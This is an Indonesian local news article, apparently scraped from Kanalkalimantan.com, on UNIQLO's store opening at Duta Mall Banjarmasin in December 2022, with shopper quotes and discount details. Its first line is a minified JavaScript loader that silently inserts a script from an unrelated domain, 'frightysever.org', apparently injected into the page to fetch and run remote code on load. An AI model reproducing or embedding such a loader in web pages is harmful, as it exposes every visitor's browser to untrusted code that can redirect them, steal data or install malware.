(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

UNIQLO Resmi Buka di Duta Mall Banjarmasin, Tak Ada Lagi ‘Jastip’


KANALKALIMANTAN.COM, BANJARMASIN – UNIQLO secara resmi membuka operasional toko ke-56 di Duta Mall Banjarmasin Lantai 2, Jum’at (9/12/2022) pagi. Saat membuka toko perdana di Kalimantan Selatan, UNIQLO Banjarmasin langsung mendapat sambutan meriah dari pengunjung yang sudah menunggu pintu dibuka.

Jenama UNIQLO adalah toko pakaian ternama dari perusahaan ritel global asal Jepang yang telah hadir di berbagai tempat dan kota di Indonesia.

Gudangnya ‘fashion’ ini menyediakan banyak promo produk-produk LifeWear yang terkenal akan kesederhanaan, kualitas terbaik, serta ketahanan. Kesempatan berburu diskon hanya berlaku selama 9-15 Desember 2022 di UNIQLO Duta Mall Banjarmasin.

 

 

Baca juga: Kasus Bayi Dibuang di Trikora Banjarbaru Hasil Hubungan Diluar Nikah, Kekasih Pelaku Kabur ke Kalteng

Sebelum pintu masuk dibuka, ratusan pengunjung sudah memadati area lantai 2 Duta Mall Banjarmasin untuk mengantre dan mengambil keranjang belanja.

Salah satu produk best seller adalah koleksi AIRism yaitu produk berbahan tekstil katun yang dikenal sebagai bahan dengan tingkat kenyamanan yang tinggi.

AIRism menjadi produk yang paling banyak dicari oleh pecinta LifeWear di Indonesia. Hal itu turut dirasakan oleh Tasya Musyaraffah, seorang influencer sekaligus content digital creator asal Banjarmasin.

“Rasanya enak sekali memakai itu tidak ada rasa pusing terus juga bahannya adem dan nyaman dipakai khususnya saat beraktivitas seharian di luar rumah itu cocok banget sih,” ungkap Tasya Musyaraffah, content digital creator asal Banjarmasin saat diwawancarai Kanalkalimantan.com saat grand opening UNIQLO Banjarmasin.

Tasya Musyaraffah, content digital creator asal Banjarmasin. Foto: wanda

 

Baca juga: Dinsos HSU Gelar Bimtek Verifikasi dan Validasi DTKS

Influencer berhijab asal Banjarmasin itu mengaku koleksi AIRis dari UNIQLO menjadi koleksi wajib yang harus ia miliki di rumah.

“Udah punya sih sebenarnaya di rumah tapi mau beli lagi, salah satunya AIRism varian ciput karena cocok banget buat saya yang berhijab ke mana-mana,” sebutnya.

Tasya pun mengajak seluruh warga Kota Banjarmasin untuk berkunjung, sekaligus berbelanja pakaian sehari-hari di UNIQLO Banjarmasin.

“Mumpung sekarang UNIQLO ada di Banjarmasin atau ajakin temen-temen dan keluarganya. Apalagi baru grand opening pastinya banyak banget promonya dan tentunya di UNIQLO sendiri itu lengkap banget berbagai macam produk pakaian,” serunya.

Sementara itu Nadia, salah seorang wargaBanjarmasin yang mengunjungi Duta Mall menyambut antusias atas hadirnya UNIQLO di Banjarmasin.

Baca juga: Dugaan Korupsi BBM, Bareskrim Polri Geledah Kantor Pertamina di Banjarmasin

“Akhirnya gak perlu jastip-jastip lagi, soalnya biasanya jastip atau biasanya kalau ke luar kota pasti tujuannya ke UNIQLO,” ungkap Nadia.

‘Jastip’ atau kepanjangan dari jasa titip adalah kegiatan yang sering dilakukan masyarakat millenial untuk dapat membeli barang yang tidak ada di daerahnya.

Menyambut hal tersebut, dirinya pun mengaku senang, apalagi tambahnya berbagai potongan harga special berbagai produk turut ditawarkan khusus di Banjarmasin saja.

AIRism menjadi produk yang paling banyak dicari, hadir di UNIQLO Duta Mall Banjarmasin. Foto: wanda

Di antara potongan harga, para pelanggan akan mendapatkan harga khusus pada beberapa koleksi untuk pria dan wanita seperti Blus Rayon Kerah Skipper Lengan 3/4, Kemeja Oxford Slim Fit Lengan Panjang, dan AIRism Celana Pendek Rilexs.

Ada juga koleksi anak-anak seperti Gaun Motif Panel Lengan Panjang, Jeans lembut Ultra Stretch (Resleting) dan masih banyak lagi.

Baca juga: 9 Desember: Hari Anti Korupsi Internasional

Untuk kebutuhan traveling khususnya ke daerah yang dingin, pelanggan juga bisa mendapatkan berbagai koleksi Mantel Rajut, Jaket Fleece dan HEATTECH innerwear dengan penawaran khusus.

Nah, bagi pelanggan yang datang dan membeli dengan pembelanjaan senilai Rp. 500.000 rupiah maka akan mendapatkan Exclusive Thermal Tumbler terbatas berlaku untuk kelipatan dan selama persediaan masih ada mulai dari tanggal 9-11 Desember 2022.

Jangan lewatkan, UNIQLO juga memiliki aplikasi UNIQLO App, yang mana bagi pengguna barunya akan mendapatkan UNIQLO App Welcome Coupon senilai Rp. 25.000 mulai dari tanggal 1 – 31 Desember 2022. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

28 menit ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

3 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

3 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

3 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

4 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

4 jam ago

This website uses cookies.